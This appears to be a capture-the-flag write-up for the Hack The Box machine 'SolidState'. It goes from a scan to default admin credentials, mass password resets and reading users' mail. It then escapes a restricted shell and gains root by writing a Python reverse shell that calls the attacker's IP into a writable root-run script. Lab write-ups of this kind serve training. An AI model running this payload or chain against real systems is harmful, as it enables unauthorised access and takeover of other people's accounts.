> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/hackthebox/linux/solidstate.md).

# SolidState

https\://app.hackthebox.com/machines/85

## Nmap

```
sudo nmap 10.10.10.51 -p- -sS -sV

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp   open  smtp    JAMES smtpd 2.3.2
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
110/tcp  open  pop3    JAMES pop3d 2.3.2
119/tcp  open  nntp    JAMES nntpd (posting ok)
4555/tcp open  rsip?
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### James SMTP Server

Looking at our nmap results we see the target system is running JAMES 2.3.2 is an Apache mail server.&#x20;

Some quick research shows that RCE is possible on version 2.3.2. However, this is not our attack vector.&#x20;

The default login credentials for the admin interface on port 4555 is usually set to `root:root`. Connecting to the admin interface with telnet we are able to authenticate.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FIODn2olqmh6slvbNozqh%2Fimage.png?alt=media\&token=ca8eafe0-fd26-4de6-8a88-32ef5188dbba)

Running the HELP command we are then able to list known users using the `listusers` command.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fn25JpVyjJRbajTlvi5j7%2Fimage.png?alt=media\&token=58f23973-0bcc-4925-bf4d-b6e47a13990b)

### Password Resetting

We also see a command for resetting a users password. From here I reset every single users password and then logged into `pop3` using `telnet` in an attempt to discover sensitive information contained within emails.

```
# Reset mindy's password
setpassword mindy password
```

Then login over telnet to pop3.

```
telnet 10.10.10.51 110

USER mindy
PASS password
LIST
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FlzOMMbggZleVx6vd6GAr%2Fimage.png?alt=media\&token=5486e060-6692-4a4d-9b1b-ae2bb21fae6a)

Retrieving email index 2 we discover SSH credentials.

```
retr 2
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fxm2iT8WXbmGIkxLxqCe8%2Fimage.png?alt=media\&token=face3772-4ef3-44bd-92ea-ce3b22b82824)

### SSH

We are then able to authenticate over SSH as the user Mindy.<br>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FPWEEZAFRqPDOQsyeCrOn%2Fimage.png?alt=media\&token=ae2b4f10-ba0c-427b-8d28-275453b985bd)

### Restricted Shell

After logging in we notice we are in a `rbash` shell which is a restricted shell. I have previously covered `rbash` shell escapes in "Sunset Decoy" where I will be using the same technique  to escape the restricted shell.

{% content-ref url="/pages/-MXX-LxfUxtuJlpASLo0" %}
[SunsetDecoy](/pentest-everything/writeups/pg-play-or-vulnhub/linux/sunsetdecoy.md)
{% endcontent-ref %}

```bash
ssh mindy@10.10.10.51 -t "bash --noprofile"
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fpz2nEkSZJprcBmAboX6u%2Fimage.png?alt=media\&token=21f5e02e-bdcc-49d6-a567-1cbf949db5f9)

### User Flag

We are then able to grab the `user.txt` flag.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FZhSKVQY0kWZQBDtWAkPw%2Fimage.png?alt=media\&token=e119962e-93bd-4e22-8698-f58f3b87e4f6)

### Enumeration

After performing some basic enumeration steps I was unable to identify any interesting routes for escalation. I decided to upload a [`pspy`](https://github.com/DominicBreuker/pspy) binary to monitor for scheduled tasks and processes that might be running.

After uploading the binary to the target system I then change the permissions to allow execution.

```
chmod +x ./pspy32
```

Then executed the binary.<br>

In the output we notice the following python script is being executed on a regular interval.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FIcSP5fTbQZ1xdhZv5xHo%2Fimage.png?alt=media\&token=a2d566f6-cad9-43f8-9b00-d1a2735ded79)

Browsing to the file we notice it is owned by root. However, we have rights to edit the file.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F0diGKbuhmNTw1rNQKkCj%2Fimage.png?alt=media\&token=9e4eb4ea-68cd-470b-9ecc-54b6231f7808)

### Privilege Escalation

To take advantage of this for privilege escalation we can clear the contents of the file and use `nano` to input a Python reverse shell.

```
# Erase file contents
echo  > tmp.py
```

Then use nano to insert the following reverse shell:

```
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.6",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FJGYTfZHzFhiNlJBR97oX%2Fimage.png?alt=media\&token=a42cd3b2-eb5f-4535-a68c-3fd584fd70eb)

### Root Flag

A few minutes later we will receive a **root** shell. Where we can then grab the `root.txt` flag.<br>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FPVzg1Tlb9kdfONnhnOEh%2Fimage.png?alt=media\&token=2db0d3de-17ee-41b9-9e75-6aecc4513943)
